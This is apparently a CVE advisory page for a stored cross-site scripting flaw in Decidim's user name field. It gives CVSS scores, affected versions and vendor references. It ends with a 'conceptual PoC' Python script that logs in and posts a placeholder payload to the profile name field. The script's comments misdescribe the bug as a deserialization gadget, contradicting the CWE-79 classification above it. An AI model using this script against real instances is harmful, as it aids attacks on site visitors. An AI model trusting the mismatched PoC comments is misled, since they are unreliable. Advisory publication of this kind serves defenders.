Security Vulnerability Report

CVE-2026-23891
CVSS 8.7 HIGH

Published: 2026-04-13 17:16:28
Last Modified: 2026-04-22 16:40:25

Description

Decidim is a participatory democracy framework. In versions below 0.30.5 and 0.31.0.rc1 through 0.31.0, a stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries. This issue has been fixed in versions 0.30.5 and 0.31.1.

CVSS Details

CVSS Score (v3.1, Primary): 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Exploitability Score: 2.3
Impact Score: 5.8

CVSS Score (v4.0, Secondary): 9.3
Severity: CRITICAL
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. stored cross-site scripting)

Configurations (Affected Products)

cpe:2.3:a:decidim:decidim:*:*:*:*:*:ruby:*:* - VULNERABLE (Decidim < 0.30.5)
cpe:2.3:a:decidim:decidim:*:*:*:*:*:ruby:*:* - VULNERABLE (Decidim 0.31.0.rc1 - 0.31.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-23891
# This script demonstrates how an attacker might send a malicious payload to the user name field.
import requests

target_url = "http://target-decidim-instance.com"
session = requests.Session()

# 1. Attacker logs in
login_data = {
    "user[email]": "[email protected]",
    "user[password]": "password"
}
session.post(f"{target_url}/users/sign_in", data=login_data)

# 2. Attacker updates profile with malicious payload in the name field
# Payload represents a code execution exploit (e.g., deserialization gadget)
malicious_payload = "<malicious_code_execution_payload>"
update_data = {
    "user[name]": malicious_payload,
    # ... other required fields
}
response = session.post(f"{target_url}/profile", data=update_data)

if response.status_code == 200:
    print("[+] Payload injected successfully via user name field.")
    print("[+] Trigger execution by visiting a comment page.")
else:
    print("[-] Injection failed.")

References

https://github.com/decidim/decidim/releases/tag/v0.30.5 (Product, Release Notes)
https://github.com/decidim/decidim/releases/tag/v0.31.1 (Product, Release Notes)
https://github.com/decidim/decidim/security/advisories/GHSA-fc46-r95f-hq7g (Vendor Advisory)